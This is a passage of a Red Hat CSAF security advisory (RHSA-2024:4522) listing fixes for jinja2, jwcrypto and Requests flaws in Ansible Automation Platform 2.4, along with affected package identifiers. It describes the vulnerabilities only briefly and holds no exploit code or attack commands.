An incorrect control flow implementation vulnerability was found in Requests. If the first request in a session is made with verify=False, all subsequent requests to the same host will continue to ignore cert verification.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64 | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64 | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch | — | ||
| Unresolved product id: 9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch | — |
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat Ansible Automation Platform 2.4\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.\n\nSecurity Fix(es):\n\n* automation-controller: jinja2: accepts keys containing non-attribute characters (CVE-2024-34064)\n* automation-controller: jwcrypto: malicious JWE token can cause denial of service (CVE-2024-28102)\n* automation-controller: requests: subsequent requests to the same host ignore cert verification (CVE-2024-35195)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nUpdates and fixes for automation controller:\n* Fixed a bug where the controller does not respect \"DATABASES[\u2018OPTIONS\u2019]\" setting, if specified (AAP-26398)\n* Changed all uses of \"ImplicitRoleField\" to perform an \"on_delete=SET_NULL\" (AAP-25136)\n* Fixed the HostMetric automated counter to display the correct values (AAP-25115)\n* Added Django logout redirects (AAP-24543)\n* automation-controller has been updated to 4.5.8\n\nAdditional changes:\n* aap-metrics-utility has been updated to 0.3.0 (AAP-25875)\n* ansible-core has been updated to 2.15.12 (AAP-25536)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4522",
"url": "https://access.redhat.com/errata/RHSA-2024:4522"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#moderate",
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"category": "external",
"summary": "2268758",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268758"
},
{
"category": "external",
"summary": "2279476",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279476"
},
{
"category": "external",
"summary": "2282114",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2282114"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4522.json"
}
],
"title": "Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update",
"tracking": {
"current_release_date": "2026-06-27T18:20:53+00:00",
"generator": {
"date": "2026-06-27T18:20:53+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.2.6"
}
},
"id": "RHSA-2024:4522",
"initial_release_date": "2024-07-12T01:43:40+00:00",
"revision_history": [
{
"date": "2024-07-12T01:43:40+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-07-12T01:43:40+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-27T18:20:53+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el9"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_inside:2.4::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product": {
"name": "Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:ansible_automation_platform_developer:2.4::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat Ansible Automation Platform"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.src",
"product_id": "ansible-core-1:2.15.12-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.src",
"product_id": "automation-controller-0:4.5.8-1.el9ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.src",
"product_id": "ansible-core-1:2.15.12-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=src\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=src"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.src",
"product_id": "automation-controller-0:4.5.8-1.el8ap.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el9ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el9ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-core-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-core@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_id": "ansible-test-1:2.15.12-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ansible-test@2.15.12-1.el8ap?arch=noarch\u0026epoch=1"
}
}
},
{
"category": "product_version",
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-cli@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-server@4.5.8-1.el8ap?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_id": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-ui@4.5.8-1.el8ap?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
